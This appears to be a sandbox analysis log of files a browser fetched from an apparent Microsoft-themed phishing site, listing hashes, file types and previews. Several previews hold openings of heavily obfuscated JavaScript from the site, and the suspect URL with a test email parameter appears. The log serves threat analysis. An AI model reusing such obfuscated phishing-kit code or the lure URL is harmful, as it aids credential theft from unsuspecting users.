                                      Preview:......JFIF.............C..............................................!........."$".$.......C.........................................................................V.."........................................................................................,.XT.*..((.-.....,%..f.)..V.BQ.t..`.!SH...,% ...*..BT.(..#;.f.fj...@.Fj..)P..R..&ig..@,.Z...)$...."... fK,J..Jf.%....B..8}.......,.Z..:......-..AIH.........`.(.J.E..X..@.....!Y..,(TB..f.....P..J......,...4...@ .,D..TIK$...*...,.L.)d......<..r....X".P..b.".P(*P..*P.!e....-..(.".e.. T.U.. .....(.H....R.t..d..*,Il....l...%B..$...e....l,..K...$...)1l.E...D..j.C*....e.U..P....KR..........*XY@.D...H.e....b*@..HYA...%..,B.....B.J$.....(.....Ak...*...%.. H.....u.....q.,JL.J.3R.d+.<..qe..lRP..P..Z...U.E...YE....@T...J..*.!@..e.J..-.-T..9$.m......D..fR..@%$..,..R@Yb.....*..E.a.$\.E.....Y."......IVec0Y...YrX.w...D...P.... R.T..P.,.((...E..P....K."...I.J ..aD.$.E2\.:.MM$Q..J...Z.&.a.l.."Q%,..s..D.L.P....Y`..U.$U....%.E$.s...@.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):16
                                      Entropy (8bit):3.875
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:903747EA4323C522742842A52CE710C9
                                      SHA1:9F806EA4288867A31A4AD53AC171AA4029DF182B
                                      SHA-256:4BD8B60F91849C936AE45615145A7B7BE2CF803322A30BABBAE7267A142CA5BB
                                      SHA-512:EEF73DC29A38ED70FFCFC321931BCB5B5A29FAAC356E8F6D84F57C532EEF44AE75021C341CF7DAE26B8211924A1C0E0EC4735F6BFC4AF3970A48EB63BFB7895F
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAk5OQZD3mkUnhIFDYOoWz0=?alt=proto
                                      Preview:CgkKBw2DqFs9GgA=
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (25746), with no line terminators
                                      Category:dropped
                                      Size (bytes):25746
                                      Entropy (8bit):5.514152556258086
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:13315EF2997C2609D49996BEC5C0AF5F
                                      SHA1:8C106CF605D9ECA2F47283B937D45946FE2D12F7
                                      SHA-256:561F8F98E9FB48F87A83F92805D4567FAC8F23C2790EA3D8586FA384E0C2247E
                                      SHA-512:3AABCAE131271D078FBFA78596242FF33C7DBD32E129200C5BEF18B8FA872305E722D8C9412E0926D8D3F12B753D949ACE12C9A85E45B5B1A70E1F77AC46692E
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:var a1_0x360b30=a1_0x3c2e;function a1_0x5ce8(_0x5cd895,_0x29d2c8){var _0x1061da=a1_0x34ec();return a1_0x5ce8=function(_0x52f441,_0xc9b673){_0x52f441=_0x52f441-(0x704+-0xf1*0x3+0x2*-0x151);var _0x37c0ec=_0x1061da[_0x52f441];if(a1_0x5ce8['cqOpKP']===undefined){var _0x399176=function(_0x4e69f6){var _0x3d06dd='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x435365='',_0x26e5b1='',_0x386361=_0x435365+_0x399176;for(var _0x4796bb=0x13ef+-0x2*-0xab2+-0x2953,_0xcc48b0,_0x21ee5f,_0x60d025=-0xd13*-0x1+0xb7*0x6+0x5*-0x379;_0x21ee5f=_0x4e69f6['charAt'](_0x60d025++);~_0x21ee5f&&(_0xcc48b0=_0x4796bb%(0x1baa+-0x23*-0x10f+-0x40b3)?_0xcc48b0*(-0x1d15+-0xf7*0x15+0x3198)+_0x21ee5f:_0x21ee5f,_0x4796bb++%(0x1949+0xf98+-0x28dd))?_0x435365+=_0x386361['charCodeAt'](_0x60d025+(-0xe45+0x67*0x17+0x50e))-(0x41b+0x457+-0x2*0x434)!==-0x171d+0x24e0+-0x1*0xdc3?String['fromCharCode'](0x1*0x8f9+0x6a3*0x3+-0xb*0x289&_0xcc48b0>>(-(0x3f0+-0x635+-0x35*-0xb)*_0x4796bb&-0x2513*-0x1+-0x10ff+-0x1*0x140
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ISO Media, AVIF Image
                                      Category:downloaded
                                      Size (bytes):39828
                                      Entropy (8bit):7.993848593409841
                                      Encrypted:true
                                      SSDEEP:
                                      MD5:7DAF861BAE85661F3C935ACE6B37058E
                                      SHA1:A329FDB74B303D6CCE5844F55D883A20ACBF19B3
                                      SHA-256:DA43C071D4914250480EFB65B14E7FBE03455420E875BF9757A908AA7B6F7D2E
                                      SHA-512:71E475CFCB3B3130EF2DF02A72271F0958BCF4D3F84FEE667B05A96C8D33BB909A8B57A12C7385256962E2A735A4805205A753D7733633751D3AF3FB01F54B62
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://imagedelivery.net/V5lSkRYhzcE91zkPxxAW4g/550dcf19-a5a9-4ea6-1c7a-34bb54683400/public
                                      Preview:....ftypavif....mif1miaf....meta.......!hdlr........pict.................pitm..........iloc....D....................#iinf..........infe........av01....Viprp...8ipco....ispe.......V........av1C.?@.....pixi............ipma..................mdat....?.j..^....2...gAO...G..............0..."..K...r...4z..`..K:..f{...(){.Y.m...N.....=9;..)...h.v.K.[...^..{.g=.R...t.....Y.5.......y0F..Z^.+..c.oc.oDB l..U....i..Z._h&`m....s/..9.]....).Q.R....)#..*@.).:.0>&...e..F... .I,C..Bz..|.14.+...,.......8......h;.[..w.HV?..\/.......".......Y..F7.Z.m.I...}J..G}%....|..M..1....)....8..c..fV....^.i....D.H#1<.cQ...LF..?..h.m...V0.....).s..D'V.......Z._..ko.........)(8...5.d...........%..fE?K..0p..1..[e..J...2H.....T..~..@d..fN...&...jNJ3....=5.........RAN).s.kL.=.J}Ve}B/NI.R.......v.y.].V .s^.z..."...........(>?.R*}...\...._Ik..........0.n.*.q^.D...O.....i.7.ZYr..\.<.9......{....c....I..".):L..P.X...s..&.7..s..r..J.../noFg.j..de.=...f.m..-..k..r..\Z.Cs...4..G....C....;...y.6..Ei
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):1108705
                                      Entropy (8bit):5.515382698372598
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:456DF96C8A3216FE79EA047CE14FF00D
                                      SHA1:CC3B7B4BD4368686207C145686B6A9EDDE5879A9
                                      SHA-256:833D9BCA55E6ACA909BB7F2403EC6BFE770A3E9945A036DF550A360C06C8A047
                                      SHA-512:D66D280344FD6F644EEDAE7D85DF64304855C6665B4B3CACB859949B913CF8C7DCCBEDE29F97B5D3C80F555C050EDE1268DD85A8D628989813C8DE3AE9A47D1A
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:const a13_0x52a220=a13_0x35c7,a13_0x488db9=a13_0x43a5;(function(_0x285e4c,_0x537990){const _0x2c8dc3=a13_0x43a5,_0x140630=a13_0x35c7,_0x43b8e3=_0x285e4c();while(!![]){try{const _0x4119de=-parseInt(_0x140630(0x1fe1))/(0xa*-0xef+0x1*-0x14fe+0x1e55)*(-parseInt(_0x2c8dc3(0x1dd,'e2Wh'))/(-0x16f4+0x607+0x10ef))+parseInt(_0x140630(0x1242))/(0xb5d*-0x3+0x581*-0x6+-0x18*-0x2cc)*(parseInt(_0x140630(0x1a89))/(0xee0+0x21ab*-0x1+-0x9*-0x217))+parseInt(_0x140630(0x1187))/(0x1*0x25e1+-0x7a*-0x39+-0x4106)*(parseInt(_0x140630(0x221))/(0xd84+0x1897*0x1+-0x1*0x2615))+parseInt(_0x2c8dc3(0x6e5,']%F['))/(-0x1988+0x8*-0x1a6+0x26bf)+parseInt(_0x140630(0x26e0))/(0x61*-0x4b+-0x2ce+-0x15*-0x17d)*(-parseInt(_0x140630(0x1425))/(-0x1695+0x1*0x1736+-0x98))+-parseInt(_0x2c8dc3(0x264,'Q]Fn'))/(0x2020+-0x12f6+-0xd20)*(-parseInt(_0x2c8dc3(0x17d8,'9sIk'))/(-0x1*0x95f+-0x12ad+0x33*0x8d))+-parseInt(_0x2c8dc3(0x10f0,'L&(y'))/(-0xe70+0x2f*-0x63+0x20a9);if(_0x4119de===_0x537990)break;else _0x43b8e3['push'](_0x43b8e3['shift'](
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (56324), with no line terminators
                                      Category:dropped
                                      Size (bytes):56324
                                      Entropy (8bit):5.533223474780913
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:2BDAAE011E2E45DFF47CACE702A801FC
                                      SHA1:5C1374223A49640B909D1ADCC311FFA3C7928F9F
                                      SHA-256:EC8D1801E997CFD19293F2D057A54C69F774F4A4AAC18EA992A7C7E6502CD922
                                      SHA-512:E9EA8EDE74B68AB7AD1952E5DE72514C3D40FFE3711490152181E8F78F4F9C454046531EB563AE6B240089B3535220FC701BEFE7CB4EE555503645C5B8FC226B
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:(function(_0x53e154,_0x167cf7){var _0x3af47d=a9_0x2548,_0x37deef=a9_0x3381,_0x57996a=_0x53e154();while(!![]){try{var _0x480cc8=parseInt(_0x37deef(0x2aa,'ME&1'))/(-0x1*-0x234b+-0x1f6a+-0x1f*0x20)*(-parseInt(_0x37deef(0x1f3,'Oh)s'))/(-0x3c+0x258*-0x6+-0x1*-0xe4e))+-parseInt(_0x37deef(0x1c5,'FN0U'))/(-0x1cea+0x419*0x7+0x2*0x1f)*(parseInt(_0x3af47d(0x15a))/(-0xd4f*0x2+-0x7*0x4b2+-0xe0*-0x44))+-parseInt(_0x37deef(0x1b2,'#SwN'))/(-0xdd9*0x1+0x2480*0x1+-0x2*0xb51)*(-parseInt(_0x37deef(0x13c,'Ps9M'))/(-0xa57*0x2+0xec*0x8+0xd54))+parseInt(_0x37deef(0x112,'s^Re'))/(-0x1b5*-0x13+0x16c+0x875*-0x4)+parseInt(_0x3af47d(0x1b7))/(0x1450+0xbd0+-0x403*0x8)*(parseInt(_0x3af47d(0x18e))/(0x46*-0xc+0x345+0xc))+parseInt(_0x3af47d(0x20b))/(-0x3*-0xb76+0x2567+0x47bf*-0x1)*(-parseInt(_0x3af47d(0x214))/(-0x6*-0x234+0x3e3*0x7+0x1431*-0x2))+-parseInt(_0x37deef(0x115,'S4*q'))/(0x8c3+-0x1d27*-0x1+-0x25de)*(parseInt(_0x3af47d(0x152))/(0x1024*0x2+0x46*0x4a+-0x3477));if(_0x480cc8===_0x167cf7)break;else _0x57996a['push']
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (4529), with no line terminators
                                      Category:downloaded
                                      Size (bytes):4529
                                      Entropy (8bit):5.314172492393445
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:3A5883456EFEAC04623DE2D7E4365330
                                      SHA1:100F07298AAD488215D4E60AB967488F932A1157
                                      SHA-256:62FFA2C3083039AFCC6C0807ED109E6449E281AF99C89C6C9B72C5551783778A
                                      SHA-512:8E7DAB73C378E3DA24C2F95DBDBA51A4C932BFEB24614A7C4779565C9459BEE74792CEAF83265F898EEEBFEFDF6D544ECA1E38DB60577EA677D51909FF6DD96C
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://coxuongkhopbariavungtau.com/?S=herp%40derp.com
                                      Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/a34f9d1faa5f3315.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" as="image" href="/microsoft.jpg"/><link rel="stylesheet" href="/_next/static/css/7b64cd318fb77179.css" data-precedence="next"/><link rel="stylesheet" href="/_next/static/css/f796ea3b426fcf90.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-20efd41c90b5bcbd.js"/><script src="/_next/static/chunks/fd9d1056-6c5a8f8591424bc5.js" async=""></script><script src="/_next/static/chunks/23-5e92960ee97bfa6f.js" async=""></script><script src="/_next/static/chunks/main-app-6e9565c54018939e.js" async=""></script><script src="/_next/static/chunks/92-1f56c09006754f8e.js" async=""></script><script src="/_next/static/chunks/app/page-c97a01c11dd2213c.js" async=""></script><script
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):736
                                      Entropy (8bit):7.577039599980696
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:24F4A960AB905EF542834509A6037210
                                      SHA1:99A3554CC448A3CAAA0BB87D2EAA8F9DC91D4C8A
                                      SHA-256:ADB6BCBC3EE624B3CCF1C15E160FE313F9EBDD117A692DF3C522A70BF873F04D
                                      SHA-512:CC0BADEB7F96507EAFB45504A5DA48CBFF218B3A7B1DF50EA41EFA9DFB40D3D8BC05A02FAF78E09AD24A1481639E1EBB7C2FB0AF7C53AC3FAEF21AFF9A6DF70C
                                      Malicious:false
                                      Reputation:unknown
                                      Preview:.PNG........IHDR...2...2......?......pHYs.................IDATx..M.NQ.........,.D....b!SR.lLd.......Y..[L.....h$.1I......L..O..[.......3.O......y.{..{.......}...n...zl\..x..klo..xL3p.F...C@....x.D......f.#F.!...NY.<.....h...._.k...\.,0.A..H.N....U..y.,.N.?"........1.J@K..7..v....S .H.r...#}...k.R...-......t......);...{.0p..H..H%.H..".C+.......i.<.l....DZ4.g..W....<.6....l.<.m./{$r@.HM...H..........&x.0..$.A.M.L....4N..$...$]......R...&8..@B..(..@.....&..P.8)..5.D.w 2.,&%.h...D.I.5...0-g.....W.V...X..5.).$..Q...8....A...2.......W..0..i7:...Y..$'.i..tvZ.8...F]../Dh.Ub..M..k..."!.G...R.p...z.2.j.1...D..L..&LBb...m.7-..XWq<l8..W,.^j.c.....!.s8/.......l2.9.Le....>.>...1...Q@F..!J.*+.@]....IEND.B`.
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                      Category:downloaded
                                      Size (bytes):1150
                                      Entropy (8bit):3.28732561467651
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:44385673EEF386EC121603CD302FD05F
                                      SHA1:C15A6D61054FFB16D8DF4DA943B545349FC82631
                                      SHA-256:069E8A1E31ABA074CC28BC9D6D54C67495BD42A02115DC232BE7C8D9F83E40A8
                                      SHA-512:E80C43BE006B5EEB66F98192B177163E92B75A5CD0AAA880ADE24A67DB7A1F29A0CB958B158244DB47386CDC775DD025E0FC1F97E3D7ADCDDB76D347F3073DA7
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://security-us.m.mimecastprotect.com/ttpwp/resources/images/favicon.ico
                                      Preview:............ .h.......(....... ..... .........................................................................................................|kW.|kW.................................................|kW.|kW.|kW.|kW.|kW.|kW.....|kW.|kW2............................|kW.|kW.|kW.|kW.|kW.|kW.....|kW.|kW.|kWX....................|kW.|kW.|kW.........|kW.|kW.|kW.|kW.|kW.|kW.|kW<................|kWm|kW.|kW.........|kW.|kW.|kWg|kW.|kW.|kW.|kW.|kW.................|kW.|kW.|kW.|kW.|kW.|kWn....|kW.|kW.|kW.|kW.|kWr....................|kWn|kW.|kW.|kWU........|kW.|kW.|kW.|kW.|kW.|kW.....................|kW||kWe............|kW.|kW.|kW.|kW.|kW.|kW=....................|kW.|kWa|kW.|kW.|kW.|kW{|kW.|kW.|kW}|kW.|kW.................|kW)|kW.|kW.|kW.|kW.|kW.|kW`............|kWy|kW.................|kWW|kW.|kW.|kW.|kW.|kW.|kW`............|kWN|kW.................|kW`|kW.|kW.|kW.|kW.|kW.|kW`|kW.|kWb|kW.|kW.|kW.................|kW.|kW&|kWS|kW.|kW.|kW.|kW.|kW.|kW.|kW~|kW@|kW ................................|kW.|kW.|kW.|k
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                      Category:downloaded
                                      Size (bytes):47992
                                      Entropy (8bit):5.605846858683577
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (15916)
                                      Category:downloaded
                                      Size (bytes):18209
                                      Entropy (8bit):5.157711637837415
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:FBC1D840518919308E492242A3D49EDE
                                      SHA1:204507669DD797527D00333E2BEC2DB907CB32AF
                                      SHA-256:682478B328444CFE35A64BA8EB7CD7F51C663FDB49334FBBB457EADED9EAEF7D
                                      SHA-512:F197C5E2E7A17D3E8ED723F70DF606ACA47E3951A326B02657FACA9477F9D3E00AEDDA65EE8ED566AC551E935DA0D3912CD7996500F690D585678F70D74C8051
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://coxuongkhopbariavungtau.com/_next/static/css/7b64cd318fb77179.css
                                      Preview:*,:after,:before{--tw-border-spacing-x:0;--tw-border-spacing-y:0;--tw-translate-x:0;--tw-translate-y:0;--tw-rotate:0;--tw-skew-x:0;--tw-skew-y:0;--tw-scale-x:1;--tw-scale-y:1;--tw-pan-x: ;--tw-pan-y: ;--tw-pinch-zoom: ;--tw-scroll-snap-strictness:proximity;--tw-gradient-from-position: ;--tw-gradient-via-position: ;--tw-gradient-to-position: ;--tw-ordinal: ;--tw-slashed-zero: ;--tw-numeric-figure: ;--tw-numeric-spacing: ;--tw-numeric-fraction: ;--tw-ring-inset: ;--tw-ring-offset-width:0px;--tw-ring-offset-color:#fff;--tw-ring-color:rgba(59,130,246,.5);--tw-ring-offset-shadow:0 0 #0000;--tw-ring-shadow:0 0 #0000;--tw-shadow:0 0 #0000;--tw-shadow-colored:0 0 #0000;--tw-blur: ;--tw-brightness: ;--tw-contrast: ;--tw-grayscale: ;--tw-hue-rotate: ;--tw-invert: ;--tw-saturate: ;--tw-sepia: ;--tw-drop-shadow: ;--tw-backdrop-blur: ;--tw-backdrop-brightness: ;--tw-backdrop-contrast: ;--tw-backdrop-grayscale: ;--tw-backdrop-hue-rotate: ;--tw-backdrop-invert: ;--tw-backdrop-opacity: ;--tw-backdrop-
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:downloaded
                                      Size (bytes):1417342
                                      Entropy (8bit):5.436075772534062
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:77D204891107785F844C0A99678E0E42
                                      SHA1:CF4830A7DA0028E32313ED5CAD51FCB6D838F015
                                      SHA-256:634D019A10C08E544BF51E51E64BD4CE12926D8B24710B66BF09EB7F97956A70
                                      SHA-512:02CA5DD736CEDA32947C8093857B44B0C3AB4FA36F695D2589A1B253B5268FA88BEF5EF3C7DABB335D90E03A497395935C713C9FFA84FCC4901B4954FBF2A5F3
                                      Malicious:false
                                      Reputation:unknown
                                      URL:https://coxuongkhopbariavungtau.com/_next/static/chunks/fd9d1056-6c5a8f8591424bc5.js
                                      Preview:var a11_0x112629=a11_0x24b4,a11_0x31c9cf=a11_0x4d3b;(function(_0x40b47b,_0x195b36){var _0x5623f8=a11_0x4d3b,_0x4f0766=a11_0x24b4,_0x48aba7=_0x40b47b();while(!![]){try{var _0x30bd76=-parseInt(_0x4f0766(0x158a))/(0xd71+0x2e*-0xad+0x1*0x11a6)+parseInt(_0x4f0766(0xd76))/(0xc4b+-0x1*-0x51b+-0x1164)+-parseInt(_0x4f0766(0x644))/(-0x16b7+-0xa0e+0x20c8)+-parseInt(_0x4f0766(0x127a))/(0x18ef+0x2f*0xd3+-0x3fa8)*(parseInt(_0x4f0766(0x24f3))/(-0x1d76+-0xbd+0x1e38))+-parseInt(_0x5623f8(0x921,'z^sG'))/(0x1c7b+0x160a+-0x1*0x327f)+parseInt(_0x5623f8(0x197f,'W4ff'))/(0x1*-0xd6b+-0x2377+0x30e9)+-parseInt(_0x4f0766(0x200c))/(-0x238c+-0x1ef+0x2583)*(-parseInt(_0x4f0766(0x1958))/(0x103e+-0x86d+0x7c8*-0x1));if(_0x30bd76===_0x195b36)break;else _0x48aba7['push'](_0x48aba7['shift']());}catch(_0x24b193){_0x48aba7['push'](_0x48aba7['shift']());}}}(a11_0x4d71,-0x31f24+0x10c212+-0x99cb));var a11_0x5da040=(function(){var _0x52b146=a11_0x24b4,_0x344298=a11_0x4d3b,_0x52de0e={};_0x52de0e[_0x344298(0x61e,'bKEz')]=_0x3442
                                      No static file info